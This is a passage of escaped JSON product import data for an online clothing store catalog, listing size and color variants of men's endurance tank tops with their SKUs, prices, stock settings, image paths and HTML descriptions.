Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tristan-endurance-tank-l-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Gray\"},\"602\":{\"sku\":\"MT02-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tristan Endurance Tank-L-Red\",\"description\":\"<p>Push yourself through punishing runs, plyometric workouts, intense competition and more in our athletic Tristan Endurance Tank. Constructed with built-in moisture-wicking technology, it\'s designed to keep you completely cool and dry on the long haul.<\\/p>\\n<p>&bull; White performance tank.<br \\/>&bull; Stylish contrast stitching. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tristan-endurance-tank-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"603\":{\"sku\":\"MT02-L-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tristan Endurance Tank-L-White\",\"description\":\"<p>Push yourself through punishing runs, plyometric workouts, intense competition and more in our athletic Tristan Endurance Tank. Constructed with built-in moisture-wicking technology, it\'s designed to keep you completely cool and dry on the long haul.<\\/p>\\n<p>&bull; White performance tank.<br \\/>&bull; Stylish contrast stitching. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tristan-endurance-tank-l-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt02-white_alt1.jpg,\\/m\\/t\\/mt02-white_back.jpg,\\/m\\/t\\/mt02-white_sideb.jpg\",\"image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt02-white_alt1.jpg,\\/m\\/t\\/mt02-white_back.jpg,\\/m\\/t\\/mt02-white_sideb.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"White\"},\"604\":{\"sku\":\"MT02-XL-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tristan Endurance Tank-XL-Gray\",\"description\":\"<p>Push yourself through punishing runs, plyometric workouts, intense competition and more in our athletic Tristan Endurance Tank. Constructed with built-in moisture-wicking technology, it\'s designed to keep you completely cool and dry on the long haul.<\\/p>\\n<p>&bull; White performance tank.<br \\/>&bull; Stylish contrast stitching. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tristan-endurance-tank-xl-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Gray\"},\"605\":{\"sku\":\"MT02-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tristan Endurance Tank-XL-Red\",\"description\":\"<p>Push yourself through punishing runs, plyometric workouts, intense competition and more in our athletic Tristan Endurance Tank. Constructed with built-in moisture-wicking technology, it\'s designed to keep you completely cool and dry on the long haul.<\\/p>\\n<p>&bull; White performance tank.<br \\/>&bull; Stylish contrast stitching. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tristan-endurance-tank-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"606\":{\"sku\":\"MT02-XL-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tristan Endurance Tank-XL-White\",\"description\":\"<p>Push yourself through punishing runs, plyometric workouts, intense competition and more in our athletic Tristan Endurance Tank. Constructed with built-in moisture-wicking technology, it\'s designed to keep you completely cool and dry on the long haul.<\\/p>\\n<p>&bull; White performance tank.<br \\/>&bull; Stylish contrast stitching. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tristan-endurance-tank-xl-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt02-white_alt1.jpg,\\/m\\/t\\/mt02-white_back.jpg,\\/m\\/t\\/mt02-white_sideb.jpg\",\"image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt02-white_alt1.jpg,\\/m\\/t\\/mt02-white_back.jpg,\\/m\\/t\\/mt02-white_sideb.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"White\"},\"607\":{\"sku\":\"MT02\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tristan Endurance Tank\",\"description\":\"<p>Push yourself through punishing runs, plyometric workouts, intense competition and more in our athletic Tristan Endurance Tank. Constructed with built-in moisture-wicking technology, it\'s designed to keep you completely cool and dry on the long haul.<\\/p>\\n<p>&bull; White performance tank.<br \\/>&bull; Stylish contrast stitching. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Tank,material=EverCool&trade;|Lycra&reg;|Organic Cotton,pattern=Solid,climate=All-weather|Indoor|Warm,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MT02-XS-Gray,size=XS,color=Gray|sku=MT02-XS-Red,size=XS,color=Red|sku=MT02-XS-White,size=XS,color=White|sku=MT02-S-Gray,size=S,color=Gray|sku=MT02-S-Red,size=S,color=Red|sku=MT02-S-White,size=S,color=White|sku=MT02-M-Gray,size=M,color=Gray|sku=MT02-M-Red,size=M,color=Red|sku=MT02-M-White,size=M,color=White|sku=MT02-L-Gray,size=L,color=Gray|sku=MT02-L-Red,size=L,color=Red|sku=MT02-L-White,size=L,color=White|sku=MT02-XL-Gray,size=XL,color=Gray|sku=MT02-XL-Red,size=XL,color=Red|sku=MT02-XL-White,size=XL,color=White\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt02-white_alt1.jpg,\\/m\\/t\\/mt02-white_back.jpg,\\/m\\/t\\/mt02-white_sideb.jpg\",\"image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt02-white_alt1.jpg,\\/m\\/t\\/mt02-white_back.jpg,\\/m\\/t\\/mt02-white_sideb.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Tank\",\"material\":\"EverCool&trade;|Lycra&reg;|Organic Cotton\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Indoor|Warm\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"608\":{\"sku\":\"MT03-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Primo Endurance Tank-XS-Blue\",\"description\":\"<p>Chances are your workout goes beyond free weights, which is why the Primo Endurance Tank employs maximum versatility. Run, lift or play ball &ndash; this breathable mesh top will keep you cool during all your activities.<\\/p>\\n<p>&bull; Red heather tank with gray pocket.<br \\/>&bull; Chafe-resistant flatlock seams. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Contrast topstitching.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"primo-endurance-tank-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"609\":{\"sku\":\"MT03-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Primo Endurance Tank-XS-Red\",\"description\":\"<p>Chances are your workout goes beyond free weights, which is why the Primo Endurance Tank employs maximum versatility. Run, lift or play ball &ndash; this breathable mesh top will keep you cool during all your activities.<\\/p>\\n<p>&bull; Red heather tank with gray pocket.<br \\/>&bull; Chafe-resistant flatlock seams. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Contrast topstitching.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"primo-endurance-tank-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt03-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null